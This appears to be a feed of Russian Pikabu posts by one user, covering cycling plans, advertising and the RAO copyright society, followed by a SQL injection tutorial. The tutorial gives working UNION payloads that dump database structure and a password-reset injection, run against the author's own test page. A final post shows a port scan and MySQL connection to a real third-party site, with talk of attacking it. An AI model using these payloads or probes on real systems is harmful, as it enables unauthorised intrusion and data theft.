ser60v

Плита в начале.

Плита через 15 минут. Она такой чистой не была с момента как начали арендовать эту квартиру!

Как я жил раньше?!

Я хочу доехать от СПБ до Москвы на велосипеде без остановки (в плане глобальной, а не вообще, а то слишком уж много воды везти придётся).

Прошлый клич почему-то не зашел. Но прошу в действительности я не многого.

Пожалуйста помогите слегка поднять пост без рейтинга, дабы получить отклик от интересных людей из Великого Новгорода.

Сегодня я окончательно понял что буду пробовать.

Не знаю получится или нет осуществить задачу, но я буду пробовать и планирую подойти к неадекватной задаче максимально адекватно.

Трек на 1000км не такой и непреодолимый, если идти его на циклокроссе порожняком.

В связи с этим у меня запланирован сброс веса, наблюдение у медиков в период тренировок, да собственно тренировки, один из этапов у которых:

- Доехать до Новгорода за субботу

- Вернуться в Санкт-Петербург за воскресенье

- Повторить пока не станет скучно

Поэтому хотелось бы получить связь с разнообразными интересными людьми, которые бы готовы были встретить в Новгороде. Я просто мерю это со своей колокольни и если бы мне предложили в Спб принять упоротого велосипедиста, с радостью бы принял.

На деле мне нужно лишь сходить в душ, возможность доступа к плите и угол куда упасть, да поставить велосипед.

Для остальных пикабушников обещаю отчёты, постараюсь разобраться с таймлапсом, дабы в итоге сделать таймлапс СПБ-Москва на вело, если на это не выйдет запредельного излишнего веса + возможных поломок в пути на которые придётся тратить время.

От себя добавлю что верю в успех

- Есть опыт 350км за день.

- Есть опыт 130км не слезая с вело

- Есть опыт не спать по трое суток

- Есть опят доехать но НСК на вело

Я немного засиделся за компом и надо слегка голову проветрить. Посему как слегка теплее станет, что днём не будет холоднее +5, хочу начать каждую субботу ездить СПБ-Новгород, а воскресенье обратно на педалях, пока не наберу готовности возвращаться не останавливаясь на ночёвку.

Так - конечная цель, набрать форму чтоб прокатиться до москвы без остановки. Думаю за 35-40 часов это осуществимо. Но ехать до Москвы думаю надо где-то в конце Июня, дабы был максимальный световой день и к тому моменту надо разобраться как у меня поживает сейчас колено, да вообще послушать организм.

Посему ищу тех к кому можно было бы упасть поспать в Новгороде, да потравить байки за чашечкой чая.

Я мирный, есть отзывы от тех кто приютил, когда ездил до Новосибирска.

Без рейтинга, просто хотелось бы найти так варианты слегка социализировать выходные, а то крыша от проги уже вообще в край едет )

Я не знаток, может чего не знаю, может вышли новые правила какие на пикабу. Но ни автор, ни модератор ни случайные прохожие мне ответ не дали. Только автор добавил в игнор, видимо дабы я больше не мог повторить свой вопрос.

Я ничего не имею против какой либо рекламы, когда реклама всёж интересная.

Канские львы тому пример, можно рассматривать рекламу как творчество.

Но блин. Этот пост рассматривается скорее как магазин на диване, к тому же он попадает в горячее.

У данного автора большинство постов - это "магазин на диване" со ссылкой на ресурс где можно заказать. И в принципе к автору вопросов нет, потому как зачем делать интересную подачу материала если и так получается привлечь клиентуру.

Вопрос к @moderator, это законно?) Если да, то у меня есть идея запулить ботов для smm в маркетинге через пикабу.

А на деле - если администрация не имеет ничего против, то я попросту кидаю подобных авторов в игнор. Если имеет, то как получилась подобная ситуация?

Вчера заметил сразу два поста связанные с РАО:

про такси

про отъевших ухи

И чёто как-то знатно прихуел озадачился...

Решил поискать а что это за ребята вообще такие. И в общем-то попал на их сайт.

Местами даже как-то здраво написано, но всё равно что-то напрягает...

Например, почему хозяин кафе должен платить данным лицам отчисления если у них в кафе есть радио?.. Неужели на радио не платят авторские отчисления?.. Начинает пахнуть мутью.

Вот, у них даже прайс интересный есть на сайте, погодите погодите... Особенно нравится пункт 3... Наверное речь про каверы, но нигде это не указано.

Пока я изучал их сайт ребята казались всё мутнее и мутнее, решил обратиться к вики, вдруг там есть что конкретнее, так вот существуют они с 1993 года. При том, у них очень интересная заявлена формулировка.

При этом РАО имеет право «защищать права» неопределённого круга правообладателей вне зависимости от того, заключили ли они с РАО договор или нет

Я конечно не знаток, но не пахнет ли тут навязыванием услуги? Да и каким образом до правообладателя доходят деньги, так ещё и не понимаю.

7 октября 1993 Президент РФ (Б. Н. Ельцин) своим указом ликвидировал РАИС, объявил его правопреемником Российское авторское общество (РАО) и определил, что РАО находится под покровительством Президента РФ

Уже интереснее. При том время такое, когда всё делалось строго для народа и по совести.

Можно копать долго откуда берут корни эти господа, но толку от этого не прибавится. Давайте лучше посмотрим, каких же результатов добились ребята за своё существование? Как же помогли правообладателям, которых незаконно обворовывают?

8 марта 2009 года в Ростове-на-Дону состоялся концерт арт-группы «Хор Турецкого», в ходе которого были публично исполнены 27 произведений российских и иностранных авторов. Организатором концерта являлось ООО «Юг-Арт». Лицензионный договор с РАО заключён не был. Южный филиал РАО 21 апреля 2009 года обратился в Кировский суд г. Ростов-на-Дону с иском в защиту прав авторов исполненных на концерте произведений. При этом в иске авторами песни «Город золотой» были ошибочно указаны Леонид Каганов и Борис Гребенщиков, от имени которых, и без их ведома, был подан иск
19 июня 2009 года суд постановил взыскать с ООО «Юг-Арт» компенсацию за каждый случай бездоговорного использования охраняемых произведений. Всего размер взысканной с ответчика компенсации составил 810 000 рублей. Кроме того, были взысканы: 8 115 рублей — госпошлина и 3 000 рублей — стоимость билетов на концерт
Кировский районный суд Ростова-на-Дону вынес 15 июня 2009 года решение, согласно которому организатор концерта группы «Deep Purple» в этом городе 19 октября 2008 года — ООО «Юг-Арт» использовало пятнадцать произведений Deep Purple без договора с РАО.

Оказывается Deep Purple это Российская группа. Странно что не часто выступают у нас на родине...

В марте 2010 года прокуратура по заявлению Российского авторского общества предъявила претензии организаторам бесплатного концерта хора ветеранов в Самаре, потребовав выплаты вознаграждения авторам за публичное исполнение песен военных лет. Недоумение действиями РАО выразили композитор Оскар Фельцман, а также ряд известных политиков.

Весной 2010 года РАО подало в суд на кинотеатр в Каменске-Уральском за то, что там демонстрировались фильмы «Аватар», «Шерлок Холмс», «Книга Илая», «Чёрная молния» без заключения договоров о вознаграждении обладателям прав на музыку, использованную в фильмах. При этом кинотеатром были заключены официальные договоры с обладателями прав на сами фильмы — ООО «Юниверсал Пикчерз Интернэшнл», ООО "Кинокомпания «Каро Премьер». РАО рассмотрело это как правонарушение, предусмотренное частью 1 статьи 7.12 КОАП РФ и добилось изъятия оборудования кинотеатра и наложило штраф в размере 30 тысяч рублей.

В конце 2011 года РАО подало иски против Московской, Свердловской и Нижнетагильской филармоний. Особенностью исков было то, что РАО фактически требовало от филармоний выплаты авторских вознаграждений за произведения классиков, живших несколько веков назад

Ну и в конце концов ребятами заинтересовался не только я... Не только мне они показались достаточно мутными...

В 2015 году Главное управление экономической безопасности уже проводило проверку РАО по факту хищения авторских средств. Весной 2016 МВД и прокуратура Москвы проверили деятельность обществ по коллективному управлению авторскими правами — РАО, Российского союза правообладателей (РСП) и Всероссийской организации интеллектуальной собственности (ВОИС). Проверка проводилась по запросу депутата Госдумы Сергея Обухова. По его данным, за время работы РАО, РСП и ВОИС «более 10 млрд руб. не дошло до авторов, исполнителей, создателей фонограмм и иных правообладателей»

27 июня 2016 года в офисе РАО на Большой Бронной (г. Москва) работали правоохранительные органы, проводился обыск, шла выемка служебных документов. В доме руководителя РАО Сергея Федотова, в этот день также проходили следственные действия.[36] 28 июня МВД РФ сообщило о задержании гендиректора РАО С. С. Федотова по подозрению в мошенничестве (часть 4 статьи 159 УК РФ) в особо крупных размерах, по предварительной оценке, ущерб от действий главы РАО превышает 500 млн рублей.

И вот встаёт резонный вопрос... Какого хера?.. Я конечно не являюсь правообладателем, но огонь в области моей задницы способен растопить полярные льды.

Может есть на пикабу способный дать внятные комментарии? Может я чего-то просто не понимаю, а они современные робингуды?..

Ломать сайты можно множеством способов, но один из самых простых и эффективных, если программист достаточно криворукий это SQL-инъекции

Давайте же немного обсудим данную тему.

Для того чтобы понять что тут происходит в принципе не нужно уметь программировать, знать SQL язык. Достаточно быть не сильно идиотом.

Что из себя представляют SQL инъекции? Это некие неправомерные действия, которые не предполагались выполняться данным скриптом.

Если привести пример из реальности, то это будет нечто такое:

Мать написала отцу записку:

Купи Васе конфет

А Вася взял и дописал: " и Пива"

В итоге отец видит записку:

Купи Васе конфет и Пива

Конечно когда прочитают логи и сверят данные Вася получит ремня, но временно он взломал систему. (поэтому правило первое, старайтесь действовать так чтоб вас не спалили)

Тут я подготовил простенький интерфейс на котором можно побаловаться:

https://test.ser60v.ru/injection/

По нормальному мы можем добавить строку, либо вытащить данные по поиску данной строки, дабы каждый ещё смог оставить немного своей дури:

Попробуем в поле поиска вбить не ololo

а

ololo' -- pikabu

Вывод выдаёт то же самое, итого мы можем применять инъекции.

В коде на сервере запрос выглядит так

SELECT * FROM `example` WHERE `text`='$find'

Мы же сами закрываем кавычки и комментируем всё последующее двумя дефисами.

Профит.

Что же мы можем сделать теперь?

Например добавить свой вывод:

' AND 0>1 UNION SELECT 1,2 -- pikabu

В этом случае мы выводим 1,2, но кому это интересно?

Если уж мы получили делать возможность инъекции необходимо узнать структуру базы, дабы получить возможность формировать желаемые запросы.

Получаем список баз

' AND 0>1 UNION SELECT GROUP_CONCAT(distinct(table_schema)), 1 FROM information_schema.columns WHERE ''='

Таким запросом мы получим список баз к которым у данного пользователя есть доступ.

Тут в принципе не нужно ничего понимать, мы выводим столько же полей, потому как знаем что у нас их 2. Но в первое выводим через запятую все базы, к которым можем получить доступ.

Отлично, мы знаем что наша база называется injection

Теперь получим список таблиц нашей базы

' AND 0>1 UNION SELECT GROUP_CONCAT(distinct(table_name)), 1 FROM information_schema.columns WHERE table_schema='injection' and ''='

Получаем список колонок из таблицы secret

' AND 0>1 UNION SELECT GROUP_CONCAT(distinct(column_name)), 1 FROM information_schema.columns WHERE table_schema='injection' and table_name='secret' and ''='

Их внезапно тоже 2, так что не парясь можно получить всё содержимое.

' AND 0>1 UNION SELECT * FROM secret WHERE ''='

Много воли я решил не давать вам на сервере, например нет возможности редактировать структуру базы, создавать новые таблицы, удалять строки. Иначе начнётся тотальный треш.

В сущности, сейчас найти данную уязвимость практически невозможно. Но всякое в жизни бывает...

Так например было дело, на каком-то ресурсе удалось при редактировании своего пароля установить такой пароль всем, потому как было что-то типа:

UPDATE `users` SET `password`='$password' WHERE id=$id

Ну и если мы делаем переменную $password

newPass' -- ololo

То пароль newPass ставится для всех пользователей.

Защититься от инъекций куда проще, чем их использовать, но если доступ к оным получен - это дарует много возможностей.

Если кто-то сможет сделать insert/update в таблицу secret каким-то образом - с меня пиво первому сделавшему..)

http://gdc.group/ вновь в строю и можно попытаться добавить свой email для рассылки.

Но проблема в том что с какого бы я ip бы ни пробовал добавлять что либо - ответ от сервера:

<div class="success">Вы успешно подписаны на новости.</div>

Готов поставить что модификация кода выполнена такой строчкой:

echo '<div class="success">Вы успешно подписаны на новости.</div>'; /*

Похоже у админа ушла неделя на осознание проблем с сервером, ну либо его только сейчас пнули...

Те на текущий момент инъекции думаю можно даже не пробовать, потому как я думаю там попросту нет соединения с базой и стоит заглушка выводящая на экран одно и тоже вне зависимости от обращения...

Интересно на сколько у них дела обстоят с паролями, но брутить это не серьезно. Из очевидных вещей даже не знаю куда там можно смотреть.

По возможности не будьте ретардами =\

Discovered open port 80/tcp on 78.47.156.63
Discovered open port 443/tcp on 78.47.156.63
Discovered open port 22/tcp on 78.47.156.63
Discovered open port 3306/tcp on 78.47.156.63

$ telnet 78.47.156.63 3306
Trying 78.47.156.63...
Connected to 78.47.156.63.
Escape character is '^]'.
R
5.5.56-MariaDB�T G&&,Kr|9� � H;1$\'L**3bumysql_native_password

Если кому либо интересна тема инъекций, могу разлениться, да у себя на сервере собрать уязвимый к ним скрипт, да пояснить как оно работает и приложить несколько экзамплов.

Пишите тесты и делайте своевременные дампы...

Будем ждать у них более интересного ресурса, который можно потестить...